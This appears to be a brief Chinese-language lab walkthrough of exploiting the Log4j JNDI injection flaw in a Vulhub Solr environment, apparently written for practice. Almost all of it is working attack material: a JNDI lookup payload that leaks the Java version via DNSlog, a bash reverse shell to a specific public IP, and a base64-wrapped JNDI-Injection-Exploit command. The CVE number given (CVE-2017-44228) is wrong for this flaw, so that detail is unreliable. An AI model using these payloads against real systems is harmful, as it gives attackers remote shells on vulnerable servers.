启动环境
cd /vulhub/log4j/CVE-2017-44228
docker-compose up -d
在DNSLOG平台上获取一个域名来看我们注入的效果
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.qqwrds.dnslog.cn
}

反弹到了

开始反弹shell,构造payload
bash -i >& /dev/tcp/47.239.9.78
/6666 0>&1
base64加密一下

命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]
最终payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4yMzkuOS43OC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "47.239.9.78"
开监听
拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址

反弹成功
